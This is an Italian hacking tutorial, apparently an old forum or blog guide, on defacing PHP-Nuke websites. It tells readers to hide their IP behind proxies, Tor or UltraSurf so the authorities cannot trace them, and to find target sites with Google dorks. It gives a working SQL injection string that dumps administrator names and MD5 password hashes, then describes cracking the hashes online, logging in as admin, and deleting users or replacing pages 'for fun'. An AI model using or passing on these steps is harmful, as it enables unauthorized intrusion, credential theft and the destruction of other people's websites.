Questa guida vuole essere puramente introduttiva al mondo del defacing, è un pò vecchiotta e funziona solo con alcuni rari siti in PHP... però (testata da me) vi butterà prepotentemente nell'ottica delle procedure per effettuare defacing.
Per prima cosa, è necessari che voi sappiate, che ogni qualvolta si accede ad un sito (tutti nessuno escluso, da facebook al sito di gigi il meccanico) si lascia traccia del proprio passaggio.
Primo fra tutti il nostro nemico numero uno: l’IP
L’ip è un numero composto da cifre variabili, che ci viene assegnato direttamente dal nostro ISP (Internet Service Provider) ogni qualvolta si accede alla rete, è la nostra targa, e ad ogni IP, viene affiliato un computer. E’ chiaro dunque, che se io mi collego a Facebook ad esempio, il server registrerà che tale indirizzo IP (localizzazione geografica inclusa) ha avuto accesso a tale account, e non solo, anche nome, cognome ed indirizzo verranno forniti, se richiesto dalle autorità competenti, in quanto il proprio ISP sa con precisione a quale cliente è stato affibiato tale indirizzo IP.
Esiste un modo per aggirare questo problema? Certo che si!
Navigare in anonimato è la risposta. Entriamo nel dettaglio:
Navigare in anonimato, significa in pratica accedere ad un server pubblico, in gergo si chiamano proxy servers, per navigare su internet direttamente dal suddetto server. Quali sono I vantaggi?
1) questi server pubblici, o proxy, hanno una latente tracciabilità, non registrano il traffico svolto dai vari utenti che vi accedono, e fornisce a tutti coloro che lo usano lo stesso indirizzo IP, logicamente diverso dal vostro, chiaramente in diversa nazione, in alcuni casi anche in diverso continente.
2) I proxy registrano il traffico in entrata, ma non hanno in alcun modo la possibilità di definire la navigazione di ogni singolo utente.
E’ chiaro quindi che navigare utilizzando un proxy è garanzia di successo!
Per navigare in anonimato su internet esistono veramente una marea di possibilità, noi ve ne indichiamo solo alcuni, I più semplici:
-E’ possibile scaricare software per la navigazione in anonimato come UltraSurf o Tor
UltraSurf è particolarmente indicato per coloro che amano navigare con Internet Explorer, e lo potete scaricare da qui:
http://ultrasurf.us/TOR è più indicato per browser Mozilla Firefox, in quanto implementa anche un bottone che permette di attivare e disattivare il proxy di TOR, per scaricare TOR collegatevi a questo link:
https://www.torproject.org/index.html.itInoltre TOR è compatibile anche con Linux
In alternativa, è possibile utilizzare siti web che permettono direttamente online di navigare in anonimato (io vi consiglio di scaricare I programmi sopra indicati, il surfing da web è meno sicuro dell’opzione precedente) uno dei siti migliori è:
https://www.megaproxy.com/freesurf/Ricordate che è possibile aprire solo un numero limitato di pagine al giorno con questo metodo.
Ora che avete scelto il vostro anonimyzer, passiamo alla nozione pratica. Esistono miliardi di siti WEB costruiti con un particolare tipo di linguaggio (senza che vi attacco la pippa sui vari linguaggi web) stiamo parlando del PHPNUKE. Questo tipo di linguaggio è spaventosamente bucato, e solo I più esperti si ricordano di disabilitare alcuni moduli ai quali è possibile accedere direttamente on line.
Come trovare questi siti? Anche qui un gioco da ragazzi.
Aprite il vostro browser google e scrivete nella barra delle ricerche, uno per volta questi termini di ricerca:
-Powered by PhpNuke
-allinurl:phpnuke/modules.php?name=Search
-allinurl:html/modules.php?name=Search
-inurl:modules.php?name=Search
Sfruttando questi criteri di ricerca, Google sarà perfettamente in grado di trovare siti costruiti con questo linguaggio. Vi ricordo che è meglio effettuare le ricerche utilizzando 1 riga alla volta, se inserite tutti e 4 I termini che vi consigliamo, creerete un archivio tale che google ne dovrà eliminare qualcuno, procedendo invece uno per volta è meglio.
Tutti I siti che nel loro link hanno la stringa “/phpnuke” sono potenzialmente vulnerabili. trovato il sito cercate il modulo search aggiungengo questa stringa al link modules.php?name=Search se nella barra degli indirizzi del sito c’è già questa stringa non aggiungete niente. (il link finale dovrà essere cosi ad esempio:
http://sito.com/phpnuke/ modules.php?name=Search)
Una volta individuata la vittima, procedete con la navigazione anonima (secondo I metodi sopra illustrati) copiate e incollate nella barra degli indirizzi il link del sito che volete colpire, e aggiungere in coda all’indirizzo web questo codice: p0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
Assicuratevi di aver inserito correttamente il link finale, il risultato dovrebbe essere questo:
http://sito.com/phpnuke/ modules.php?name=Searchp0hh0nsee%’) UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
Ora premere invio. SEavete trovato il sito vulnerabile vi usciranno tutte le password in MD5 degli admin con i relativi nomi in caso contrario vi usciranno una di queste parole (illegal operation, oppure verrete rieindirizzati ad un altro sito o l’ultimo caso vi uscirà “Modulo non inserito”)
Provate e riprovate (potrebbero volerci decine e decine di tentativi prima di trovarne uno vulnerabile)
Una volta che siete entrati in possesso delle password e dei nomi utenti degli amministratori, dovete decrittografarle (l’MD5 è un linguaggio crittografato).
Per farlo basta collegarsi a questo sito:http://md5.rednoize.com/
Una volta che avete convertito le password crakkate da MD5 a linguaggio normale, non dovete far altro che inserirle, con il nome utente, ed il gioco è fatto: ORA SIETE AMMINISTRATORI DEL SITO E SIETE LIBERI D FARE CIO CHE VOLETE, CANCELLARE UTENTI, ADDIRITTURA CANCELLARE E CHIUDERE IL SITO, SOSTITUIRE LE PAGINE E TANTO ALTRO.
Buon divertimento!
Si ringrazia per questa guida: SanAndreas.labs
